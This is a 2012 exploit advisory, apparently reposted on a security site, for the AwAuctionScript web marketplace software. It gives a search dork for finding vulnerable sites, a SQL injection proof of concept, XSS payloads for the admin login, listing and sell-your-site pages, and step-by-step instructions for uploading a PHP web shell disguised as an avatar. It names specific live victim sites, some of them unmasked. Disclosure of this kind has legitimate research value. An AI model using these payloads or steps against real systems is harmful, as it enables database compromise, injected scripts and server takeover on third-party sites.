AwAuctionScript Multiple Vulnerabilities

2012.11.05
Credit: X-Cisadane
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:/listing.php?category=Website

============= AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities ============= :----------------------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : AwAuctionScript (Aw Auction Script - Market Place for WebMasters) Multiple Vulnerabilities : # Date : 04 November 2012 : # Author : X-Cisadane : # Download : http://www.awauctionscript.com OR Googling it with this Keyword : AwAuctionScript - Market Place for WebMasters : # Version : ALL : # Category : Web Applications : # Vulnerability : SQL Injection Vulnerability, Upload Shell/Backdoor Vulnerability, XSS/HTML Injection Vulnerability : # Tested On : Mozilla Firefox 16.0.2 (Windows XP SP 3 32-Bit English) : # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari :----------------------------------------------------------------------------------------------------------------------------------------: DORKS ===== inurl:/listing.php?category=Website Proof of Concept ================ SQL Injection : http://victim site/<path>/listing.php?category=Website&PageNo=[-SQL] 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-12,6' at line 1 Example : http://www.domXXngang.net/listing.php?category=Website&PageNo=-1 http://www.wmXXXediacorp.com/sellyoursite/listing.php?category=Website&PageNo=-1 http://buyanXXXebsite.org/listing.php?category=Website&PageNo=-1 http://www.saXXXet.net/offers/listing.php?category=Website&PageNo=-1 http://nomXXXub.com/listing.php?category=Website&PageNo=-1 http://webXXXama.com/listing.php?category=Website&PageNo=-1 http://www.flipiXXXetplace.com/listing.php?category=Website&PageNo=-1 XSS (Non Persistent) - On the Admin Login page (Tested on Firefox) Fill username with : "><script>alert(/xss/)</script> and the password with anything. Example : http://buyandsellwebsite.org/admin/ PIC : http://i50.tinypic.com/i20own.png - On Listing Page (Tested on Firefox) http://victim site/<path>/listing.php?category=[Insert HTML/XSS Script] Example : http://buyandsellwebsite.org/listing.php?category=<script>alert(/x-cisadane/)</script> PIC : http://i46.tinypic.com/dwqip0.png XSS (Persistent) *Must be logged in http://victim site/<path>/sell-your-site.php Example (Victim/Target) : http://www.flipitmarketplace.com/sell-your-site.php - Go to http://www.flipitmarketplace.com/sell-your-site.php - On the Site Name, fill it with this script : <script>alert("Hacked)</script> - On the Site Description, fill it with this script on from this link http://pastebin.com/5mfg7xv4 PIC : http://i49.tinypic.com/20qz0x1.png Upload Shell/Backdoor : Example (Victim/Target) : http://websiterama.com/ - Prepare your .php backdoor, rename it with index.php3 - Register to victim site, for example : http://websiterama.com/ - Activate by E-Mail, after Activated login to http://websiterama.com/login.php - Go to http://websiterama.com/edit-account.php - Upload the avatar, browse your Backdoor/Shell file & upload it! - Copy the image location/image url of the thumbnail (on the right) - Paste in URL. Voilaaaa! http://websiterama.com/avatar/1031115958.php3

References:

http://www.awauctionscript.com


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top